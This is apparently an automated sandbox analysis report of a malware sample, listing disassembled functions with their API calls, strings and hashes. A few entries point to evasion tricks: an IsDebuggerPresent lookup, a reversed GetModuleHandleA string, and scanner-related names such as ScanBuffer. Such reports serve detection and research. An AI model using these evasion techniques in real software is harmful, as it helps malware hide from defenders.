                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                                              • Instruction ID: d852c8d0e59b04d8a3c11fc73db99773e86cd6eb1e6b16eb265199c43b656592
                                                              • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                                              • Instruction Fuzzy Hash: 81511531A00354AFDB24DF69CC41B6A77F5FF85720F1041AAE809EB290EB39DA09DB40
                                                              Function 02C19B66 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __dosmaperr$_free
                                                              • String ID:
                                                              • API String ID: 242264518-0
                                                              • Opcode ID: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                                              • Instruction ID: d729138d3a0a4036b6f5d3767ac7b7a31945f3b5571cfa6f1487e8d7c2d9ce1f
                                                              • Opcode Fuzzy Hash: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                                              • Instruction Fuzzy Hash: 6B31A27240460AFFDF156FA4DC659AF7BADEF46364F100169F81097290DB31CA50EBA1
                                                              Function 02BF1154 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 02BF1161
                                                              • int.LIBCPMT ref: 02BF1174
                                                                • Part of subcall function 02BEE075: std::_Lockit::_Lockit.LIBCPMT ref: 02BEE086
                                                                • Part of subcall function 02BEE075: std::_Lockit::~_Lockit.LIBCPMT ref: 02BEE0A0
                                                              • std::_Facet_Register.LIBCPMT ref: 02BF11B4
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02BF11BD
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02BF11DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                              • String ID:
                                                              • API String ID: 2536120697-0
                                                              • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                                              • Instruction ID: e2836ede9ad579a417331964e4a7d86fda3b26eb9b0c455aed1d215925a64010
                                                              • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                                              • Instruction Fuzzy Hash: 56110A32500114E7CB14EF98E8418DE777ADF40360F1046AAE909A7290DB30DE859BD0
                                                              Function 02C19686 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02C196A2
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02C196BB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Value___vcrt_
                                                              • String ID:
                                                              • API String ID: 1426506684-0
                                                              • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                              • Instruction ID: 737574180aa1ff997557bcb7fc15dc252e0d81aa6d3d5e41a2255c1a7fbe0e23
                                                              • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                              • Instruction Fuzzy Hash: 6901843620D3215EAB652A766C96A2B2F96EF437757340739F614460E0FFE18801B594
                                                              Function 02B8A9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(?,00000000,02B8AA6F,?,?,00000000), ref: 02B8A9F0
                                                                • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA20
                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02B8AA2B
                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA49
                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02B8AA54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                              • String ID:
                                                              • API String ID: 4102113445-0
                                                              • Opcode ID: 9a075c9aaf5666457ae9038b37bdb6e8e721cf87b331d94bbb385cc5bc430adc
                                                              • Instruction ID: 4db1739fb723edf74cc4dd9345b1fa43a8b376d42c9425a4a0a9ce344990dceb
                                                              • Opcode Fuzzy Hash: 9a075c9aaf5666457ae9038b37bdb6e8e721cf87b331d94bbb385cc5bc430adc
                                                              • Instruction Fuzzy Hash: 85012B356006486FF701F674CD12B9E739DDB41B14F5105E1F62DAAAD0D674DE00CAA4
                                                              Function 02C2F128 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                              • Instruction ID: 6760e4c03a0cb1fefee2e27a6d800a97e1a2b1a743abc0fa55df1274a03de9c8
                                                              • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                              • Instruction Fuzzy Hash: 67F096324002787BD624EB6DED84C9B77FAAA457543D44809F404D7940DFB0F884AE54
                                                              Function 02C34347 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __dosmaperr
                                                              • String ID: H
                                                              • API String ID: 2332233096-2852464175
                                                              • Opcode ID: 025001eace35e284d02f7f8ceb0d8143efc63f8ac6326f5556ede81aad0919f8
                                                              • Instruction ID: 354e2ac27f07d9a362731dbb68644a375bc9032ef7130f5368575c1fc3b376f9
                                                              • Opcode Fuzzy Hash: 025001eace35e284d02f7f8ceb0d8143efc63f8ac6326f5556ede81aad0919f8
                                                              • Instruction Fuzzy Hash: 49A16A32A101448FCF2EEF78E841BAD7BA1EB46320F1401A9F815EF391DB358916DB56
                                                              Function 02C2CE55 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free_strpbrk
                                                              • String ID: *?$.
                                                              • API String ID: 3300345361-3972193922
                                                              • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                              • Instruction ID: be63e524c4b08755fe315479c194f9cb47b185696a6f38680e99233787b4dee4
                                                              • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                              • Instruction Fuzzy Hash: E0518375E00219AFDF14DFA8C880AADB7B5EF89314F15416AE854E7340DB729B099B50
                                                              Function 02B8AA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(?,00000000,02B8AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B8AAB7
                                                                • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locale$InfoThread
                                                              • String ID: eeee$ggg$yyyy
                                                              • API String ID: 4232894706-1253427255
                                                              • Opcode ID: 2063db90a3a644ac7a7f405a0ee1d72694a40f4fce0820541a1b75fa9bb2aed1
                                                              • Instruction ID: e15a8b52813a1d1561470f60d0b4639c0caab73c993c016c1ba367efa8ba5c1e
                                                              • Opcode Fuzzy Hash: 2063db90a3a644ac7a7f405a0ee1d72694a40f4fce0820541a1b75fa9bb2aed1
                                                              • Instruction Fuzzy Hash: B541F1753041064BD712BB698C902BEB3FBEB81204F5449E7E67EC7344EA38E906CE21
                                                              Function 02B98020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc
                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                              • API String ID: 1883125708-1952140341
                                                              • Opcode ID: b7443c4ef544cacd868449d880d3ecc8a67ab2b2fa4bdcd95122d33efd72319e
                                                              • Instruction ID: a599b593a3718ec0285e2559cfe5608e5b5ccb2d50b7e1175ffcdfe2f3a0f5c5
                                                              • Opcode Fuzzy Hash: b7443c4ef544cacd868449d880d3ecc8a67ab2b2fa4bdcd95122d33efd72319e
                                                              • Instruction Fuzzy Hash: B6F04971650304BFEF00EBA8D802A5E77AAEB4A740BA189F0F50897A10DA30AD10CA64
                                                              Function 02B9EB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: IsDebuggerPresent$KernelBase
                                                              • API String ID: 1646373207-2367923768
                                                              • Opcode ID: 0599b24204b04d17eac865f3a8fdaed0129b57bbc49a27c04d8a9b5b8ff2e440
                                                              • Instruction ID: c53f71deb4cd9cdc3d453f49dbe707813cf432df9d6911bbdf4a33748a3ba3b4
                                                              • Opcode Fuzzy Hash: 0599b24204b04d17eac865f3a8fdaed0129b57bbc49a27c04d8a9b5b8ff2e440
                                                              • Instruction Fuzzy Hash: F5D012B27557901EBE00BAF80CC4C5E03CD8B0562AB240EF2F02BD60E2E6AAC8529520
                                                              Function 02B8C3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,02BAC10B,00000000,02BAC11E), ref: 02B8C402
                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B8C413
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                              • API String ID: 1646373207-3712701948
                                                              • Opcode ID: 5446c4d82e08ba693b0dcbd544fc2e586c82b71f2d6aaa1f3283db5bab93140d
                                                              • Instruction ID: 30d5f4e4c7826c761ad5e143cbaae48e58a9f8eca252cb83d477fd94b7e396ef
                                                              • Opcode Fuzzy Hash: 5446c4d82e08ba693b0dcbd544fc2e586c82b71f2d6aaa1f3283db5bab93140d
                                                              • Instruction Fuzzy Hash: B1D05EE0A413434EE3047AB16882A323B888704748F4C68E6A01D46102C7718490CFA4
                                                              Function 02C27C4B Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                                              • Instruction ID: 12261ae1060e6d9918ccc9ea37127748ea8579376614ea720a07b6af24e38e83
                                                              • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                                              • Instruction Fuzzy Hash: CDC129719042659FDB24DF78DC80BBAFBB9EF81310F1401AAD48097291EF718A4DDB54
                                                              Function 02C2A19F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 03e8336be6feeefa5c512672f5a0d1266db9fcb18614ce6fe0fce40636c8e9f5
                                                              • Instruction ID: 9040815539cbf30683f55d585b171ee4099e92a22c6772ec5a99ea1d94652b00
                                                              • Opcode Fuzzy Hash: 03e8336be6feeefa5c512672f5a0d1266db9fcb18614ce6fe0fce40636c8e9f5
                                                              • Instruction Fuzzy Hash: C4A19C72D003A69FD715CF58C8817BEBBE5EF95350F1441ADD8999B281CB38CA49CB50
                                                              Function 02C2B4EF Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1a9ba8701dd1ff07f611dd49c6527d64924ec2b1001cab84c3fe07def6274ef
                                                              • Instruction ID: d61574705d20a4b2f1908963962db32cd0788f50c44ff0797fe4d77fb7f6f65a
                                                              • Opcode Fuzzy Hash: b1a9ba8701dd1ff07f611dd49c6527d64924ec2b1001cab84c3fe07def6274ef
                                                              • Instruction Fuzzy Hash: D4C1F374E042599FCB11DFA8D841BEDBBB1AF4A308F044195E858A7392CB709E49CF75
                                                              Function 02C2128D Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
